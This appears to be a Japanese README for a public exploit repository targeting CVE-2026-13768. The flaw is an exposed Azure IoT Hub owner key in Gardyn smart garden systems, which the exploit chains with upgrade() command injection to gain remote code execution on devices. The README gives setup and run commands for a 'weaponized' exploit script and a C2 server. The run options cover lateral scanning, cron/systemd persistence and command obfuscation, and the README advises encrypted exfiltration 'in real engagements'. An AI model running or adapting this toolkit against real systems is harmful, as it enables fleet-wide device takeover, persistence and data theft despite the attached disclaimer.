
Azure IoT Hubにおいて、所有者レベルのShared Access Keyが露出すると、接続されたIoTデバイスに対して未認証のリモートコード実行(RCE)が可能になります。概念実証
[!WARNING] このリポジトリには、重大度の高いIoT脆弱性に対する完全に機能する概念実証(PoC)が含まれています。
このコードは教育目的、許可されたセキュリティ研究、および防御的テストのためだけに提供されます。無断使用は違法です。 所有者からの明示的な書面による許可なしにシステムをテストまたは悪用することは、Computer Fraud and Abuse Act(CFAA)、EUサイバーレジリエンス法、およびお住まいの地域のその他の適用法律に違反します。
著者は、このコードに起因する誤用、損害、または法的結果について一切の責任を負いません。
常に法的・倫理的範囲内で運用してください。
CVE-2026-13768 は、Gardyn スマートガーデンシステムにおいて IoT Hub のオーナーレベルの接続文字列を露出させ、Azure IoT Hub に対する完全な管理制御を可能にします。この PoC は、オーナーキーを持つ攻撃者が upgrade() クラウド・ツー・デバイスメソッドのコマンドインジェクションを介して接続デバイス上で**リモートコード実行(RCE)**を達成し、フリート全体の侵害を可能にすることを示します。
このスイートには以下が含まれます:
これは進行中の研究プロジェクトです - サプライチェーンおよびIoTクラウドの設定ミスを理解し防御するために、責任を持って使用してください。
upgrade() メソッドを介してコマンドを注入します(CVE-2025-29631 のコマンドインジェクションを利用).
├── poc.py # Main weaponized exploitation script
├── validate.py # Safe, read-only validation tool
├── c2s.py # Lightweight C2 server for demos
├── TEMPLATES.md # Ready-to-Use Command Templates.
├── README.md
リポジトリをクローンします:
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2026-13768.git
cd CVE-2026-13768
python3 -m venv venv
仮想環境をアクティブにします(または作成します):
source venv/bin/activate
python3 -m pip install --upgrade pip
依存関係をインストールします。
python3 -m pip install azure-iot-hub
python validate.py --conn-str "HostName=yourhub.azure-devices.net;SharedAccessKeyName=iothubowner;SharedAccessKey=..."
終了コード0 = アクセス可能なデバイスを持つ有効なオーナーキー。変更は行われません。
python poc.py \
--mode exploit \
--conn-str "HostName=..." \
--device-id "target-device-123" \
--command "whoami" \
--lateral-scan \
--persist
完全なオプションについては python poc.py --help を実行してください。
python c2s.py --port 4444
iothubowner として認証しますupgrade() ダイレクトメソッドのコマンドインジェクションを悪用します注記:横移動および永続化コードは説明用のプレースホルダーです。ターゲットデバイスのOSと制約(例:BusyBox制限環境)に合わせて調整してください。
/tmp/cve_2026_13768.log に書き込みます。実際のエンゲージメントでは暗号化された外部送信に置き換えてください。obfuscate_cmd() / deobfuscate_cmd() 関数を拡張します。以下の分野へのコントリビューションを歓迎します:
イシューまたはPRをオープンしてください。
大きな力には大きな責任が伴います。
| Argument | 説明 | 必須 |
|---|
--mode | validate または exploit | いいえ(デフォルト:validate) |
--conn-str | IoT Hub オーナー接続文字列 | はい |
--device-id | ターゲットデバイスID | はい(exploitモード) |
--command | upgrade() インジェクションで実行するコマンド | いいえ(デフォルト:id) |
--lateral-scan | デバイスからのLAN偵察を有効化 | いいえ |
--persist | 永続化を試行(例:cron、systemd) | いいえ |
--c2 | C2サーバーへの接続を確立 | いいえ |